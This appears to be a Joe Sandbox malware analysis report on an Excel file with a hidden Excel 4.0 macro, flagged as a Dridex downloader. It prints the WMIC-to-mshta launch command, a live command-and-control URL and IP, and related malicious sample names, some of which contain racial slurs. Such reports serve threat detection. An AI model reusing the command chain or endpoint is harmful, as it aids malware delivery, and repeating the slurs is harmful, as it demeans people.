Loading ...

Play interactive tourEdit tour

Windows Analysis Report payment 435975469.xlsb

Overview

General Information

Sample Name:payment 435975469.xlsb
Analysis ID:528046
MD5:751e07abc0bc08abf349a49fd8c81703
SHA1:ad977311af2765089b9bffb5bb03cb26c6ab874c
SHA256:595c56c71c91c470c05c6243e46835d1b25b15c247fcd2a025ef0369e6a6b798
Tags:Dridexxlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2840 cmdline: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 3060 cmdline: mshta C:\ProgramData\EYCmMYHJOyR.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\EYCmMYHJOyR.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", ProcessId: 2840
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf", ProcessId: 2840

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: payment 435975469.xlsbVirustotal: Detection: 9%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 139.59.64.195:8080
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 139.59.64.195:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 139.59.64.195:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 139.59.64.195:8080
      Source: Joe Sandbox ViewIP Address: 139.59.64.195 139.59.64.195
      Source: unknownTCP traffic detected without corresponding DNS query: 139.59.64.195
      Source: unknownTCP traffic detected without corresponding DNS query: 139.59.64.195
      Source: unknownTCP traffic detected without corresponding DNS query: 139.59.64.195
      Source: unknownTCP traffic detected without corresponding DNS query: 139.59.64.195
      Source: unknownTCP traffic detected without corresponding DNS query: 139.59.64.195
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.466155130.0000000001B90000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70DEA7D3.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 139.59.64.195:8080Connection: Keep-Alive
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\EYCmMYHJOyR.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: payment 435975469.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: payment 435975469.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.466036264.0000000000270000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaulto
      Found obfuscated Excel 4.0 MacroShow sources
      Source: payment 435975469.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 56
      Source: payment 435975469.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: payment 435975469.xlsbVirustotal: Detection: 9%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\EYCmMYHJOyR.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$payment 435975469.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF24A.tmpJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@4/7@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: payment 435975469.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: payment 435975469.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: payment 435975469.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 57FF.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 57FF.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: eycmmyhjoyr.rtf
      Source: unknownProcess created: cmd line: eycmmyhjoyr.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1936Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 760Thread sleep time: -60000s >= -30000s
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.682698004.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      payment 435975469.xlsb10%VirustotalBrowse
      payment 435975469.xlsb9%ReversingLabsScript-WScript.Malware.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.683649889.0000000003740000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.683461175.0000000003547000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.466155130.0000000001B90000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.683250818.0000000003360000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    139.59.64.195
                    unknownSingapore
                    14061DIGITALOCEAN-ASNUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528046
                    Start date:24.11.2021
                    Start time:17:49:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 40s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:payment 435975469.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal92.troj.expl.evad.winXLSB@4/7@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:49:45API Interceptor11x Sleep call for process: WMIC.exe modified
                    17:49:46API Interceptor443x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    139.59.64.195_2070731.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    _2070731.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment12248998.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    promo details-747242.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment12248998.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    promo details-747242.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Netflix-54850.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Netflix-54850.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    request477360122.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    salecoupon05894.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    request477360122.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    salecoupon05894.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription60547.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription60547.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    007422621.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    007422621.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    promo details 0396729.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    promo details 0396729.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Rooms_requirement.3692.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking-6880.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    DIGITALOCEAN-ASNUS_2070731.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    _2070731.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    jPzSCuyellowfacebrownietacohead.dllGet hashmaliciousBrowse
                    • 107.170.4.227
                    tax payment12248998.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    promo details-747242.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    tax payment12248998.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    promo details-747242.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    Netflix-54850.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    Netflix-54850.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    VREcGZRvOYEWbeanerwopnigga.dllGet hashmaliciousBrowse
                    • 107.170.4.227
                    sjAPKtporrJZCRbeanerwopnigga.dllGet hashmaliciousBrowse
                    • 107.170.4.227
                    request477360122.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    salecoupon05894.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    VREcGZRvOYEWbeanerwopnigga.dllGet hashmaliciousBrowse
                    • 107.170.4.227
                    sjAPKtporrJZCRbeanerwopnigga.dllGet hashmaliciousBrowse
                    • 107.170.4.227
                    request477360122.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    salecoupon05894.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195
                    request-038477145.xlsbGet hashmaliciousBrowse
                    • 157.245.108.215
                    request-038477145.xlsbGet hashmaliciousBrowse
                    • 157.245.108.215
                    subscription60547.xlsbGet hashmaliciousBrowse
                    • 139.59.64.195

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\EYCmMYHJOyR.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4615
                    Entropy (8bit):5.0608578290611925
                    Encrypted:false
                    SSDEEP:96:8B+NjARKVHzys6CdZ2HicZoKDnBkMhRqDM3L7tZU8p4Z:8BEjAaTy9GZ2CcZHDnBhADMXC
                    MD5:917B40E35B587030F8B8733E7067F38C
                    SHA1:E133A85BDC74026801998A417F1998FE5CE9E583
                    SHA-256:644610D43C88A544C046A8EC4D4E1D959B7A547D291482C584CBCC94958326EE
                    SHA-512:71BEDA5B416C82BAD9390253B5AB879C63DDE3A27498B61081DAEBEC8F134F2086794ED23613938C25D469F4E1871034C377611AD878B6E4A8583CA1183184E6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\EYCmMYHJOyR.rtf, Author: Joe Security
                    Reputation:low
